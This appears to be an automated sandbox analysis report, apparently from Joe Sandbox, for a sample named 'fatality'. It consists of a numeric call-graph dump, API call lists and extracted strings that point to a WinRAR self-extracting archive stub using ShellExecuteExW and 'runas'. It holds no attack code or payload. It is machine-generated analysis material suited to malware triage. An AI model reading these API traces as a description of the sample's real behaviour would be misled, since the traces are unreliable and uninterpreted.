36690->36664 36693 8e1341 36693->36690 36694 8e1354 GetDlgItem 36693->36694 36694->36690 36695 8e1364 36694->36695 36695->36690 36696 8e136a SetWindowTextW 36695->36696 36696->36690 36700 8ea0bb 36697->36700 36698 8ea14c 36699 8ea2b2 4 API calls 36698->36699 36701 8ea175 36698->36701 36699->36701 36700->36698 36700->36701 36788 8ea2b2 36700->36788 36703 8fac04 SetCurrentDirectoryW 36701->36703 36703->36653 36705 8e9678 36704->36705 36706 8e96d5 CreateFileW 36705->36706 36707 8e96c9 36705->36707 36706->36707 36707->36660 36708->36649 36709->36655 36710->36661 36718 8fc749 _swprintf __cftof _wcslen __EH_prolog _wcsrchr 36711->36718 36712 8fbdcf 36712->36669 36713 8fca67 SetWindowTextW 36713->36718 36714 903e3e UnhandledExceptionFilter 36714->36718 36716 8fcc31 GetDlgItem SetWindowTextW SendMessageW 36716->36718 36717 8fcc71 SendMessageW 36717->36718 36718->36712 36718->36713 36718->36714 36718->36716 36718->36717 36809 8ea5d1 FindFirstFileW FindFirstFileW 36718->36809 36720 8fda5c __EH_prolog 36719->36720 36810 8f0659 36720->36810 36722 8fda8d 36814 8e5b3d 36722->36814 36724 8fdaab 36818 8e7b0d 36724->36818 36728 8fdafe 36728->36675 36730 8fd6a8 36729->36730 36731 8fa5c6 4 API calls 36730->36731 36732 8fd6ad 36731->36732 36733 8fbf15 36732->36733 36734 8fd6b5 GetWindow 36732->36734 36733->36582 36733->36583 36734->36733 36736 8fd6d5 36734->36736 36735 8fd6e2 GetClassNameW 36735->36736 36736->36733 36736->36735 36737 8fd76a GetWindow 36736->36737 36738 8fd706 GetWindowLongW 36736->36738 36737->36733 36737->36736 36738->36737 36739 8fd716 SendMessageW 36738->36739 36739->36737 36740 8fd72c GetObjectW 36739->36740 37198 8fa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 36740->37198 36742 8fd743 37199 8fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 36742->37199 37200 8fa80c 8 API calls 36742->37200 36745 8fd754 SendMessageW DeleteObject 36745->36737 36747 8fa65b GetDlgItem 36746->36747 36747->36598 36747->36599 36749 8fabcc 36748->36749 36750 8fabf1 36748->36750 36749->36750 36753 8fabe3 FindWindowExW 36749->36753 36751 8fabff 36750->36751 36752 8fabf6 SHAutoComplete 36750->36752 36754 8fb093 36751->36754 36752->36751 36753->36750 36755 8fb09d __EH_prolog 36754->36755 36756 8e13dc 3 API calls 36755->36756 36757 8fb0bf 36756->36757 37201 8e1fdc 36757->37201 36759 8fb0d1 36760 8fb0eb 36759->36760 36761 8fb0d9 36759->36761 36763 8e19af 21 API calls 36760->36763 36762 8e1692 2 API calls 36761->36762 36765 8fb0e4 36762->36765 36766 8fb10d __InternalCxxFrameHandler ___std_exception_copy 36763->36766 36764 8e1692 2 API calls 36764->36765 36765->36614 36765->36618 36766->36764 36767->36639 36769 8fb568 5 API calls 36768->36769 36770 8fd4e0 GetDlgItem 36769->36770 36771 8fd536 SendMessageW SendMessageW 36770->36771 36772 8fd502 36770->36772 36773 8fd572 36771->36773 36774 8fd591 SendMessageW SendMessageW SendMessageW 36771->36774 36775 8fd50d ShowWindow SendMessageW SendMessageW 36772->36775 36773->36774 36776 8fd5e7 SendMessageW 36774->36776 36777 8fd5c4 SendMessageW 36774->36777 36775->36771 36776->36616 36777->36776 36778->36676 36779->36679 36780->36686 36781->36591 36782->36640 36783->36650 36784->36637 36785->36630 36786->36693 36787->36690 36789 8ea2bf 36788->36789 36790 8ea2e3 36789->36790 36791 8ea2d6 CreateDirectoryW 36789->36791 36800 8ea231 36790->36800 36791->36790 36793 8ea2e9 36791->36793 36794 8ea325 36793->36794 36796 8ea4ed 36793->36796 36794->36700 36797 8fec50 36796->36797 36798 8ea4fa SetFileAttributesW 36797->36798 36799 8ea510 36798->36799 36799->36794 36803 8ea243 36800->36803 36804 8fec50 36803->36804 36805 8ea250 GetFileAttributesW 36804->36805 36806 8ea23a 36805->36806 36807 8ea261 36805->36807 36806->36793 36807->36806 36808 8ea279 GetFileAttributesW 36807->36808 36808->36806 36809->36718 36811 8f0666 _wcslen 36810->36811 36832 8e17e9 36811->36832 36813 8f067e 36813->36722 36815 8f0659 _wcslen 36814->36815 36816 8e17e9 UnhandledExceptionFilter 36815->36816 36817 8f067e 36816->36817 36817->36724 36819 8e7b17 __EH_prolog 36818->36819 36836 8ece40 36819->36836 36821 8e7b32 36822 8feb38 UnhandledExceptionFilter 36821->36822 36823 8e7b5c 36822->36823 36842 8f4a76 36823->36842 36825 8e7b8b 36826 8e7c7d 36825->36826 36827 8e7c87 36826->36827 36828 8e7cf1 36827->36828 36865 8ea56d 36827->36865 36831 8e7d50 36828->36831 36846 8e8284 36828->36846 36831->36728 36833 8e17ff 36832->36833 36834 8e1847 __InternalCxxFrameHandler ___std_exception_copy 36832->36834 36833->36834 36835 903e3e UnhandledExceptionFilter 36833->36835 36834->36813 36835->36834 36837 8ece4a __EH_prolog 36836->36837 36838 8feb38 UnhandledExceptionFilter 36837->36838 36839 8ece8d 36838->36839 36840 8feb38 UnhandledExceptionFilter 36839->36840 36841 8eceb1 36840->36841 36841->36821 36843 8f4a80 __EH_prolog 36842->36843 36844 8feb38 UnhandledExceptionFilter 36843->36844 36845 8f4a9c 36844->36845 36845->36825 36847 8e828e __EH_prolog 36846->36847 36871 8e13dc 36847->36871 36850 8e82aa 36851 8e82f2 36850->36851 36879 8e1a04 36850->36879 36979 8e1692 36851->36979 36854 8e8389 36893 8e8430 36854->36893 36856 8e83a3 36857 8e83e8 36856->36857 36986 8f1b66 16 API calls 36856->36986 36896 8e1f6d 36857->36896 36860 8e82ee 36860->36851 36860->36854 36862 8ea56d 3 API calls 36860->36862 36861 8e83f3 36861->36851 36900 8e3b2d 36861->36900 36910 8e848e 36861->36910 36862->36860 36866 8ea582 36865->36866 36870 8ea5b0 36866->36870 37192 8ea69b 36866->37192 36868 8ea592 36869 8ea597 FindClose 36868->36869 36868->36870 36869->36870 36870->36827 36872 8e13e6 __EH_prolog 36871->36872 36873 8ece40 UnhandledExceptionFilter 36872->36873 36874 8e1419 36873->36874 36875 8feb38 UnhandledExceptionFilter 36874->36875 36878 8e1474 __cftof 36874->36878 36876 8e1461 36875->36876 36876->36878 36987 8eb505 36876->36987 36878->36850 36880 8e1a0e __EH_prolog 36879->36880 36887 8e1a61 36880->36887 36889 8e1b9b 36880->36889 37003 8e13ba 36880->37003 36883 8e3b2d 3 API calls 36884 8e1c12 36883->36884 36885 8e3b2d 3 API calls 36884->36885 36886 8e1c5a 36884->36886 36885->36884 36886->36889 36891 8e9e80 SetFilePointer 36886->36891 36887->36883 36887->36889 36888 8e3b2d 3 API calls 36890 8e1cde 36888->36890 36889->36860 36890->36888 36890->36889 36891->36890 37014 8ecf3d 36893->37014 36895 8e8440 36895->36856 36897 8e1f77 __EH_prolog 36896->36897 36899 8e1fa6 36897->36899 37022 8e19af 36897->37022 36899->36861 36901 8e3b3d 36900->36901 36902 8e3b39 36900->36902 36909 8e9e80 SetFilePointer 36901->36909 36902->36861 36903 8e3b4f 36904 8e3b6a 36903->36904 36905 8e3b78 36903->36905 36908 8e3b76 36904->36908 37096 8e32f7 SetFilePointer DialogBoxParamW UnhandledExceptionFilter _swprintf __EH_prolog 36904->37096 37097 8e286b 3 API calls 3 library calls 36905->37097 36908->36861 36909->36903 36911 8e8498 __EH_prolog 36910->36911 36914 8e84d5 36911->36914 36924 8e8513 36911->36924 37129 8f8c8d 19 API calls 36911->37129 36913 8e84f5 36915 8e851c 36913->36915 36916 8e84fa 36913->36916 36914->36913 36919 8e857a 36914->36919 36914->36924 36915->36924 37130 8f8c8d 19 API calls 36915->37130 36916->36924 37098 8e7a0d 36916->37098 36919->36924 37104 8e5d1a 36919->37104 36921 8e8605 36921->36924 37110 8e8167 36921->37110 36923 8e8797 36925 8ea56d 3 API calls 36923->36925 36927 8e8802 36923->36927 36924->36861 36925->36927 36927->36924 36929 8e898b 36927->36929 37131 8e8117 DialogBoxParamW 36927->37131 36928 8e8a5f 36930 8e8ab6 36928->36930 36942 8e8a6a 36928->36942 36929->36928 36931 8e89e1 36929->36931 36932 8e8a4c 36930->36932 37134 8e7fc0 9 API calls 36930->37134 36931->36932 36934 8ea231 2 API calls 36931->36934 36939 8e8b14 36931->36939 36932->36939 36947 8e8ab4 36932->36947 36933 8e959a 2 API calls 36933->36924 36938 8e8a19 36934->36938 36935 8e8b5a 36940 8eab1a UnhandledExceptionFilter 36935->36940 36937 8e959a 2 API calls 36937->36924 36938->36932 37132 8e92a3 9 API calls 36938->37132 36939->36935 36977 8e90eb 36939->36977 37135 8e98bc 36939->37135 36943 8e8bd1 36940->36943 36942->36947 37133 8e7db2 9 API calls 36942->37133 36945 8eab1a UnhandledExceptionFilter 36943->36945 36957 8e8be7 36945->36957 36947->36933 36948 8e8cbc 36949 8e8d18 36948->36949 36950 8e8e40 36948->36950 36951 8e8d8a 36949->36951 36954 8e8d28 36949->36954 36952 8e8e66 36950->36952 36953 8e8e52 36950->36953 36973 8e8d37 36950->36973 36960 8e8167 2 API calls 36951->36960 36956 8f3377 20 API calls 36952->36956 36955 8e9215 21 API calls 36953->36955 36954->36973 37139 8e77b8 11 API calls 36954->37139 36955->36973 36958 8e8e7f 36956->36958 36957->36948 36959 8e8c93 36957->36959 36965 8e981a SetFilePointer 36957->36965 37141 8f3020 21 API calls 36958->37141 36959->36948 37138 8e9a3c SetFilePointer SetFilePointer SetEndOfFile 36959->37138 36963 8e8dbd 36960->36963 36966 8e8de6 36963->36966 36967 8e8df5 36963->36967 36963->36973 36965->36959 37140 8e7542 GetFileAttributesW GetFileAttributesW CreateDirectoryW SetFileAttributesW 36966->37140 37116 8e9155 36967->37116 36970 8e9090 36972 8ea4ed SetFileAttributesW 36970->36972 36970->36977 36971 8e903e 37126 8e9da2 36971->37126 36972->36977 36973->36970 36973->36971 36973->36977 37125 8e9f09 SetEndOfFile 36973->37125 36976 8e9085 36978 8e9620 CloseHandle 36976->36978 36977->36937 36978->36970 36980 8e16a4 36979->36980 36981 8e95ca 36980->36981 36982 8e95d1 36980->36982 36985 8e8420 36980->36985 36983 8e974e DeleteFileW 36981->36983 36984 8e9620 CloseHandle 36982->36984 36983->36985 36984->36985 36985->36828 36986->36857 36988 8eb50f __EH_prolog 36987->36988 36991 8eb61e 36988->36991 36992 8eb630 __cftof 36991->36992 36995 8f10dc 36992->36995 36998 8f109e 36995->36998 36999 8f10b1 36998->36999 37002 4936863 NtQueryInformationProcess GetSystemInfo 36999->37002 37000 8eb597 37000->36878 37002->37000 37010 8e1732 37003->37010 37005 8e13d6 37006 8e9e80 37005->37006 37007 8e9e92 37006->37007 37008 8e9eb8 SetFilePointer 37007->37008 37009 8e9eb0 37007->37009 37008->37009 37009->36887 37011 8e1748 37010->37011 37013 8e178d __InternalCxxFrameHandler ___std_exception_copy 37010->37013 37012 903e3e UnhandledExceptionFilter 37011->37012 37011->37013 37012->37013 37013->37005 37015 8ecf4d 37014->37015 37017 8ecf54 37014->37017 37018 8e981a 37015->37018 37017->36895 37019 8e9833 37018->37019 37021 8e9e80 SetFilePointer 37019->37021 37020 8e9865 37020->37017 37021->37020 37023 8e19bf 37022->37023 37025 8e19bb 37022->37025 37026 8e18f6 37023->37026 37025->36899 37027 8e1908 37026->37027 37028 8e1945 37026->37028 37029 8e3b2d 3 API calls 37027->37029 37034 8e3fa3 37028->37034 37032 8e1928 37029->37032 37032->37025 37036 8e3fac 37034->37036 37035 8e3b2d 3 API calls 37035->37036 37036->37035 37037 8e1966 37036->37037 37037->37032 37038 8e1e50 37037->37038 37039 8e1e5a __EH_prolog 37038->37039 37048 8e3bba 37039->37048 37041 8e1e84 37042 8e1732 UnhandledExceptionFilter 37041->37042 37044 8e1f0b 37041->37044 37043 8e1e9b 37042->37043 37061 8e18a9 UnhandledExceptionFilter 37043->37061 37044->37032 37046 8e1eb3 _wcslen 37062 8e18a9 UnhandledExceptionFilter 37046->37062 37049 8e3bc4 __EH_prolog 37048->37049 37054 8e3bda 37049->37054 37063 8f3377 37049->37063 37051 8e3ca3 37051->37054 37071 8eab1a 37051->37071 37052 8e3c71 37052->37051 37052->37054 37084 8e20bd UnhandledExceptionFilter 37052->37084 37054->37041 37056 8e3d41 37057 8e3dd7 37056->37057 37058 8e3dc7 37056->37058 37085 8f3020 21 API calls 37057->37085 37075 8e9215 37058->37075 37061->37046 37062->37044 37064 8f338c ___std_exception_copy 37063->37064 37065 8f341c 37064->37065 37067 8f3440 __cftof 37064->37067 37068 8f34c6 _com_raise_error 37064->37068 37086 8f32aa 20 API calls 3 library calls 37065->37086 37067->37052 37070 8f3524 37068->37070 37087 8f3106 20 API calls 37068->37087 37070->37052 37072 8eab28 37071->37072 37074 8eab32 37071->37074 37073 8feb38 UnhandledExceptionFilter 37072->37073 37073->37074 37074->37056 37076 8e921f __EH_prolog 37075->37076 37077 8e13ba UnhandledExceptionFilter 37076->37077 37078 8e9231 37077->37078 37088 8ed114 37078->37088 37080 8e928a 37080->37054 37081 8e9243 37081->37080 37083 8ed114 20 API calls 37081->37083 37095 8ed300 WriteFile UnhandledExceptionFilter __InternalCxxFrameHandler 37081->37095 37083->37081 37084->37051 37085->37054 37086->37067 37087->37068 37092 8ed12a __InternalCxxFrameHandler 37088->37092 37089 8ed29a 37090 8ed0cb 6 API calls 37089->37090 37093 8ed291 37089->37093 37090->37093 37091 8f8c8d 19 API calls 37091->37092 37092->37089 37092->37091 37092->37093 37094 8eac05 UnhandledExceptionFilter 37092->37094 37093->37081 37094->37092 37095->37081 37096->36908 37097->36908 37100 8e7a4a 37098->37100 37101 8e7a20 37098->37101 37099 8e7a73 37099->36924 37100->37099 37142 8e75de 37100->37142 37101->37100 37165 8e7401 21 API calls __EH_prolog 37101->37165 37105 8e5d2a 37104->37105 37171 8e5c4b 37105->37171 37108 8e5d5d 37109 8e5d95 37108->37109 37176 8eb1dc CharUpperW _wcslen ___vcrt_InitializeCriticalSectionEx 37108->37176 37109->36921 37111 8e8186 37110->37111 37112 8e8232 37111->37112 37183 8ebe5e CharUpperW UnhandledExceptionFilter __InternalCxxFrameHandler 37111->37183 37182 8f1fac CharUpperW 37112->37182 37115 8e823b 37115->36923 37117 8e915f __EH_prolog 37116->37117 37118 8e919a 37117->37118 37119 8e13ba UnhandledExceptionFilter 37117->37119 37120 8e959a 2 API calls 37118->37120 37123 8e91c3 37119->37123 37122 8e9204 37120->37122 37122->36973 37123->37118 37184 8e9f7a 37123->37184 37188 8e9bd0 37123->37188 37125->36971 37128 8e9db3 37126->37128 37127 8e9e3f SetFileTime 37127->36976 37128->37127 37129->36914 37130->36924 37131->36927 37132->36932 37133->36947 37134->36932 37136 8e98c5 GetFileType 37135->37136 37137 8e98c2 37135->37137 37136->37137 37137->36935 37138->36948 37139->36973 37140->36973 37141->36973 37143 8e75e8 __EH_prolog 37142->37143 37144 8e7681 37143->37144 37145 8e765e 37143->37145 37147 8e76ad 37143->37147 37146 8e3bba 21 API calls 37144->37146 37145->37099 37148 8e76a2 37146->37148 37149 8ea56d 3 API calls 37147->37149 37151 8e959a 2 API calls 37148->37151 37150 8e76dc 37149->37150 37152 8e76f4 37150->37152 37153 8ea4ed SetFileAttributesW 37150->37153 37151->37145 37166 8e9f1a CreateFileW 37152->37166 37153->37152 37155 8e771a 37156 8e3bba 21 API calls 37155->37156 37159 8e773d 37155->37159 37157 8e772e 37156->37157 37157->37159 37162 8e9620 CloseHandle 37157->37162 37158 8e7760 37161 8ea4ed SetFileAttributesW 37158->37161 37159->37158 37167 8e98e0 37159->37167 37163 8e7791 37161->37163 37162->37159 37164 8e959a 2 API calls 37163->37164 37164->37148 37165->37100 37166->37155 37168 8e98ea 37167->37168 37169 8e994b CreateFileW 37168->37169 37170 8e996c 37169->37170 37170->37158 37177 8e5b48 37171->37177 37173 8e5c6c 37173->37108 37175 8e5b48 CharUpperW 37175->37173 37176->37108 37179 8e5b52 37177->37179 37178 8e5c3a 37178->37173 37178->37175 37179->37178 37181 8eb1dc CharUpperW _wcslen ___vcrt_InitializeCriticalSectionEx 37179->37181 37181->37179 37182->37115 37183->37112 37185 8e9f8f 37184->37185 37186 8e9f88 37184->37186 37185->37186 37187 8ea003 WriteFile 37185->37187 37186->37123 37187->37185 37189 8e9be3 37188->37189 37190 8e9bdc 37188->37190 37189->37190 37191 8e9785 ReadFile GetFileType 37189->37191 37190->37123 37191->37189 37193 8ea6a8 37192->37193 37194 8ea6c1 FindFirstFileW 37193->37194 37197 8ea6fe 37193->37197 37195 8ea6d0 37194->37195 37194->37197 37196 8ea6e4 FindFirstFileW 37195->37196 37195->37197 37196->37197 37197->36868 37198->36742 37199->36742 37200->36745 37202 8e1fe8 37201->37202 37203 8e1a04 3 API calls 37202->37203 37204 8e1ff5 37202->37204 37203->37204 37204->36759 37205 ac8598 37206 ac85a5 VirtualAlloc 37205->37206 37208 8fcd58 37211 8fcd7b 37208->37211 37210 8fd40a 37217 8fc793 _swprintf __cftof _wcslen _wcsrchr 37211->37217 37218 8fd78f 37211->37218 37212 8fca67 SetWindowTextW 37212->37217 37213 903e3e UnhandledExceptionFilter 37213->37217 37215 8fcc31 GetDlgItem SetWindowTextW SendMessageW 37215->37217 37216 8fcc71 SendMessageW 37216->37217 37217->37210 37217->37212 37217->37213 37217->37215 37217->37216 37230 8ea5d1 FindFirstFileW FindFirstFileW 37217->37230 37219 8fd799 __cftof _wcslen 37218->37219 37220 8fd9e7 37219->37220 37221 8ea231 2 API calls 37219->37221 37226 8fd93d 37219->37226 37220->37217 37223 8fd8ba 37221->37223 37222 8fd9de ShowWindow 37222->37220 37224 8fd8d9 ShellExecuteExW 37223->37224 37224->37220 37227 8fd8ec 37224->37227 37225 8fd925 37231 8fdc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 37225->37231 37226->37220 37226->37222 37227->37225 37227->37226 37228 8fd91b ShowWindow 37227->37228 37228->37225 37230->37217 37231->37226 37232 8feed7 37233 8feee0 37232->37233 37235 8feef5 ___scrt_uninitialize_crt 37233->37235 37236 908977 37233->37236 37239 90c05a 37236->37239 37242 90c073 37239->37242 37240 8ffbbc CatchGuardHandler UnhandledExceptionFilter 37241 908986 37240->37241 37241->37235 37242->37240 37243 90ba89 37245 90baae 37243->37245 37246 90ba91 37243->37246 37244 90bada 37244->37246 37251 90b691 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter 37244->37251 37245->37244 37247 908dcc _free RtlFreeHeap 37245->37247 37248 908dcc _free RtlFreeHeap 37246->37248 37247->37244 37250 90baa4 37248->37250 37251->37246 37252 8e9a74 37253 8e9a7e 37252->37253 37254 8e9b9d SetFilePointer 37253->37254 37255 8e981a SetFilePointer 37253->37255 37256 8e9b79 37253->37256 37257 8e9ab1 37253->37257 37254->37257 37255->37256 37256->37254 37258 90bd4d 37259 90bd54 37258->37259 37259->37258 37260 8ffbbc CatchGuardHandler UnhandledExceptionFilter 37259->37260 37261 90bddd 37260->37261 37262 8e10d0 37265 8e5abd 37262->37265 37266 8e5ac7 __EH_prolog 37265->37266 37267 8eb505 2 API calls 37266->37267 37268 8e5ad3 37267->37268 37271 8e5cac NtQueryInformationProcess GetSystemInfo 37268->37271

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 008FB7E0 Relevance: 84.7, APIs: 37, Strings: 11, Instructions: 731windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008FB7E5
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008FB8D1
                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FB8EF
                                                                                                                                                            • IsDialogMessageW.USER32(?,?), ref: 008FB902
                                                                                                                                                            • TranslateMessage.USER32(?), ref: 008FB910
                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 008FB91A
                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 008FB93D
                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 008FB960
                                                                                                                                                            • GetDlgItem.USER32(?,00000068), ref: 008FB983
                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008FB99E
                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,009135F4), ref: 008FB9B1
                                                                                                                                                              • Part of subcall function 008FD453: _wcslen.LIBCMT ref: 008FD47D
                                                                                                                                                            • SetFocus.USER32(00000000), ref: 008FB9B8
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FBA24
                                                                                                                                                              • Part of subcall function 008FD4D4: GetDlgItem.USER32(00000068,?), ref: 008FD4E8
                                                                                                                                                              • Part of subcall function 008FD4D4: ShowWindow.USER32(00000000,00000005,?,?), ref: 008FD510
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008FD51B
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,009135F4), ref: 008FD529
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008FD53F
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008FD559
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008FD59D
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008FD5AB
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008FD5BA
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008FD5E1
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,009143F4), ref: 008FD5F0
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FBAC2
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FBB7C
                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 008FBC6F
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FBD1E
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008FBD7D
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000065,009135F4), ref: 008FBD94
                                                                                                                                                            • GetDlgItem.USER32(?,00000065), ref: 008FBD9D
                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008FBDAC
                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008FBDBB
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008FBE68
                                                                                                                                                            • _wcslen.LIBCMT ref: 008FBEBE
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FBEE8
                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 008FBF32
                                                                                                                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 008FBF4C
                                                                                                                                                            • GetDlgItem.USER32(?,00000068), ref: 008FBF55
                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 008FBF6B
                                                                                                                                                            • GetDlgItem.USER32(?,00000066), ref: 008FBF85
                                                                                                                                                            • SetWindowTextW.USER32(00000000,0092A472), ref: 008FBFA7
                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 008FC007
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008FC01A
                                                                                                                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 008FC0BD
                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 008FC197
                                                                                                                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 008FC1D9
                                                                                                                                                              • Part of subcall function 008FC73F: __EH_prolog.LIBCMT ref: 008FC744
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008FC1FD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$DialogH_prologLong_wcslen$CallbackDispatchDispatcherEnableExecuteFocusParamShellShowTranslateUser
                                                                                                                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$runas$winrarsfxmappingfile.tmp
                                                                                                                                                            • API String ID: 1645173463-1271227274
                                                                                                                                                            • Opcode ID: 7f7461bd5a9832fb55ec8957bf65d181706d38fbd16d4a07e1e3e65733c1b6c3
                                                                                                                                                            • Instruction ID: fb4745c4bb3b7353abd2ddc5f3b76ba02910ede6db34112d4b504d656c6f55d4
                                                                                                                                                            • Opcode Fuzzy Hash: 7f7461bd5a9832fb55ec8957bf65d181706d38fbd16d4a07e1e3e65733c1b6c3
                                                                                                                                                            • Instruction Fuzzy Hash: D442D37195828CBAEB21ABB4DD4AFBE7B6CFB12700F004155F744E60E2CB745A45DB22
                                                                                                                                                            Function 008FDF1E Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 195windowCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 526 8fdf1e-8fdf66 call 8f0863 call 8fa64d call 8fac16 call 8ffff0 536 8fdf68-8fdf74 call 8fc5c4 526->536 537 8fdfe6-8fe0f4 call 8e4092 LoadIconW call 8fb6dd call 8eda42 call 8f90b7 * 2 DialogBoxParamW call 8f9178 * 2 526->537 541 8fdf76-8fdf8d 536->541 542 8fdfe0-8fdfe1 call 8fdbde 536->542 574 8fe0fd-8fe104 537->574 575 8fe0f6 537->575 547 8fdf8f-8fdf9e 541->547 548 8fdfd6-8fdfde 541->548 542->537 553 8fdfcd-8fdfd4 547->553 554 8fdfa0-8fdfcb call 900320 call 8fdbde 547->554 548->537 553->548 554->553 576 8fe10b-8fe11c call 8ef279 574->576 577 8fe106 call 8fae2f 574->577 575->574 581 8fe11e-8fe129 call 8fee5c 576->581 582 8fe12a-8fe13d DeleteObject 576->582 577->576 581->582 583 8fe13f-8fe140 DeleteObject 582->583 584 8fe146-8fe14d 582->584 583->584 586 8fe14f-8fe156 584->586 587 8fe167-8fe175 584->587 586->587 589 8fe158-8fe162 call 8e6d83 586->589 590 8fe189-8fe196 587->590 591 8fe177-8fe17d call 8fdc3b 587->591 589->587 594 8fe1ba-8fe1be call 8fac7c 590->594 595 8fe198-8fe1a4 590->595 591->590 600 8fe1c3-8fe1ce 594->600 598 8fe1a6-8fe1ae 595->598 599 8fe1b4-8fe1b6 595->599 598->594 601 8fe1b0-8fe1b2 598->601 599->594 602 8fe1b8 599->602 601->594 602->594
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008FAC16: OleInitialize.OLE32(00000000), ref: 008FAC2F
                                                                                                                                                              • Part of subcall function 008FAC16: SHGetMalloc.SHELL32(00928438), ref: 008FAC70
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FE048
                                                                                                                                                            • LoadIconW.USER32(00000000,00000064), ref: 008FE078
                                                                                                                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 008FE0C9
                                                                                                                                                            • DeleteObject.GDI32 ref: 008FE130
                                                                                                                                                            • DeleteObject.GDI32(?), ref: 008FE140
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
